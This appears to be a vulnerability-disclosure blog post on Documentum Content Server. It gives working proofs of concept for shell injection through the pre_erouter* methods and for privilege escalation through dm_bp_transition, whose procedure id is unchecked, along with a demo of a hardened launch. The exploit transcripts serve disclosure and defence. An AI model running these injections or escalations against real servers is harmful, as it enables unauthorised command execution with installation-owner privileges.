documentum security vulnerabilities: pre_erouter* methods

Like other vulnerable methods (dm_event_sender, replicate_setup_methods), the pre_erouter* methods do not validate their input parameters and can be used to execute arbitrary shell commands on the Content Server host:

API> retrieve,c,dm_method where object_name like 'pre_erouter%'
...
1001ffd78000046c
API> dump,c,l
...
USER ATTRIBUTES

  object_name                     : pre_erouter1_queue
  owner_name                      : dmadmin
  owner_permit                    : 7
  group_name                      : docu
  group_permit                    : 5
  world_permit                    : 3
  method_verb                     : dmawk
  launch_direct                   : F
  launch_async                    : F
  trace_launch                    : T
  run_as_server                   : T
  use_method_content              : T
  method_type                     : dmawk
  use_method_server               : F
  is_restartable                  : F

The method content (a dmawk script, executed because use_method_content is T) builds the command line by plain string concatenation and hands it to system(), so any argument value containing shell metacharacters is interpreted by the shell:

#  Echo_attr()
  cmdstr = "dmbasic -f " dm_home"/bin/dm_rendPDF_preq.ebs" \
        " -e preq -- " \
        " -docbase " docbase_name \
        " -user " user_name \
        " -router " routerid \
        " -package " packageid \
        " -task " task \
        " -source " source \
        " -ticket " ticket
  ret = system(cmdstr)
  exit (ret)

Example of exploitation (the injected -docbase value terminates the dmbasic command with ';' and appends an arbitrary command):

 ~]$ cat  /tmp/test
cat: /tmp/test: No such file or directory
 ~]$ idql repo -Uusername -Ppassword >/dev/null <<_EOF_
> execute do_method with method='pre_erouter4_forward',
> arguments='-docbase ";echo awk_methods_have_vulnerability > /tmp/test;"'
> go
> _EOF_

 ~]$ cat  /tmp/test
awk_methods_have_vulnerability
 ~]$
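
To show the mechanism outside a Documentum installation, here is an added example (not Documentum's code and not from the original post): a POSIX shell script with a stub dmbasic that only records its arguments, a concatenated-string launch mirroring the dmawk method above, and an argv-based launch that is not injectable. The script path, the fixed placeholder values for -user/-router/-package/-task/-source/-ticket, and a marker file standing in for /tmp/test are assumptions made for the demonstration; the payload is the one from the idql example above, assumed (as the page's result shows) to reach docbase_name without its surrounding quotes.

```shell
#!/bin/sh
# Added example, not Documentum code: reproduce why the pre_erouter* dmawk
# wrapper is injectable and what a non-injectable launch looks like.
# A stub "dmbasic" stands in for the real binary and only records its argv;
# the marker file plays the role of /tmp/test from the page.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
MARKER="$WORK/marker"

# Stub dmbasic (assumption): writes its arguments, one per line, and exits 0.
cat >"$WORK/dmbasic" <<'EOF'
#!/bin/sh
printf '%s\n' "$@" >"${DMBASIC_ARGLOG:?}"
EOF
chmod +x "$WORK/dmbasic"
PATH="$WORK:$PATH"
export DMBASIC_ARGLOG="$WORK/argv.log"

# Mirror of the dmawk method: cmdstr is built by string concatenation and
# handed to system(), i.e. to "sh -c". Only -docbase is attacker-controlled
# here; the other values are fixed placeholders (assumption).
vulnerable_launch() {
    docbase_name=$1
    cmdstr="dmbasic -f dm_rendPDF_preq.ebs -e preq -- -docbase $docbase_name -user dmadmin -router 0 -package 0 -task 0 -source 0 -ticket 0"
    rm -f "$MARKER" "$DMBASIC_ARGLOG"
    # system(cmdstr); stderr hidden because the injected ';' leaves the
    # trailing "-user dmadmin ..." to be run as a (non-existent) command.
    sh -c "$cmdstr" 2>/dev/null || true
    [ -e "$MARKER" ] && echo injected || echo clean
}

# Hardened form: every value is its own argv entry and is never re-parsed by
# a shell, so metacharacters in docbase_name stay literal.
hardened_launch() {
    docbase_name=$1
    rm -f "$MARKER" "$DMBASIC_ARGLOG"
    dmbasic -f dm_rendPDF_preq.ebs -e preq -- \
        -docbase "$docbase_name" -user dmadmin -router 0 \
        -package 0 -task 0 -source 0 -ticket 0
    [ -e "$MARKER" ] && echo injected || echo clean
}

# The -docbase value the (stub) dmbasic actually received on its last run.
received_docbase() {
    awk '/^-docbase$/ { getline; print; exit }' "$DMBASIC_ARGLOG"
}

# Payload from the page, with /tmp/test replaced by the marker path.
PAYLOAD=";echo awk_methods_have_vulnerability > $MARKER;"

echo "vulnerable, docbase=repo      : $(vulnerable_launch repo)"
echo "vulnerable, injected payload  : $(vulnerable_launch "$PAYLOAD")"
echo "hardened,   injected payload  : $(hardened_launch "$PAYLOAD")"
echo "hardened dmbasic saw -docbase : $(received_docbase)"
```

The concatenated launch creates the marker only when the payload is supplied, while the argv-based launch passes the whole payload, semicolons included, to dmbasic as a single literal -docbase value. That is the property a fixed method has to provide: arguments must reach the child process as argv entries, not as text re-parsed by a shell.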

This vulnerability was reported as CS-44409 (Security vulnerability with pre_erouter methods – shell injection)

documentum security vulnerabilities: dm_bp_transition method

Documentum has two implementations of lifecycle transitions:

  • dmbasic
  • java

The first one is implemented by the dm_bp_transition method:

API> retrieve,c,dm_method where object_name='dm_bp_transition'
...
1001ffd780000176
API> dump,c,l
...
USER ATTRIBUTES

  object_name                     : dm_bp_transition
  owner_name                      : dmadmin
  owner_permit                    : 7
  group_name                      : docu
  group_permit                    : 5
  world_permit                    : 3
  method_verb                     : ./dmbasic -f./dm_bp_transition.ebs -eBP_Transition
  method_args                   []: <none>
  launch_direct                   : T
  launch_async                    : F
  trace_launch                    : F
  run_as_server                   : T

This method accepts the following parameters:

Sub BP_Transition(_
    docbase_name$,_
    server_config_name$,_
    user_name$,_
    user_ticket$,_
    sysID$,_
    policyID$,_
    aliasID$,_
    userEntryID$,_
    actionID$,_
    userActionID$,_
    userPostprocID$,_
    targetState$,_
    targetStateNo$,_
    resumeStateNo$,_
    run_entry$,_
    run_actions$,_
    commitFlag$,_
    attachFlag$,_
    login_as$,_
    orig_sessionID$)

The most interesting parameters are user_name$, which (together with user_ticket$) is used to open the repository session the procedure will run in:

  buff = "connect," & docbase_name & "." & server_config_name _
         & "," & user_name & "," & user_ticket
  sess = dmAPIGet(buff)

  If sess = "" Then
    dmExit(CONNECTION_ERROR)
  End If

and userPostprocID$, which names the dm_procedure object whose dmbasic code is executed after the transition is committed:

  If (result = True And commitFlag = "T") Then
    If (debug = True) Then
      PrintToLog sess, "Commit the changes."
    End If
    result = CommitIt(sess, sysID, policyID, aliasID, targetStateNo, resumeStateNo, attachFlag)
    If (result = True) Then
      If (debug = True) Then
        PrintToLog sess, "Run post action."
      End If
      result = RunProcedure(userPostprocID, 4, sess, sysID,_
                            user_name, targetState)
    End If
  Else

Because the method runs with run_as_server set to T and the procedure id is taken from the caller's arguments without any check, this implementation allows any user who can create a dm_procedure object to write their own dmbasic code and have it executed with installation owner privileges, for example:

$ cat /tmp/test
cat: /tmp/test: No such file or directory
$ cat > test.ebs
Public Function EntryCriteria(ByVal SessionId As String, _
                              ByVal ObjectId As String, _
                              ByVal UserName As String, _
                              ByVal TargetState As String, _
                              ByRef ErrorString As String _
                ) As Boolean
  ' executed on the Content Server host under the installation owner account
  t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
  EntryCriteria = True
End Function
$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): unprivileged_user
Please enter password for unprivileged_user:


        EMC Documentum iapi - Interactive API interface
        (c) Copyright EMC Corp., 1992 - 2011
        All rights reserved.
        Client Library Release 6.7.1000.0027


Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info:  "Session 0101d920800b1a37
       started for user unprivileged_user."


Connected to Documentum Server running Release 6.7.1090.0170  Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920804e5416
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='dm_bp_transition',
         arguments='repo repo dmadmin "" 0000000000000000 0000000000000000
                    0000000000000000 0801d920804e5416 0000000000000000 0000000000000000
                    0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000
         '
(1 row affected)

API> Bye
$ cat /tmp/test
dm_bp_transition_has_vulnerability

This vulnerability was reported as CS-44439 (Security vulnerability with dm_bp_transition.ebs – shell injection)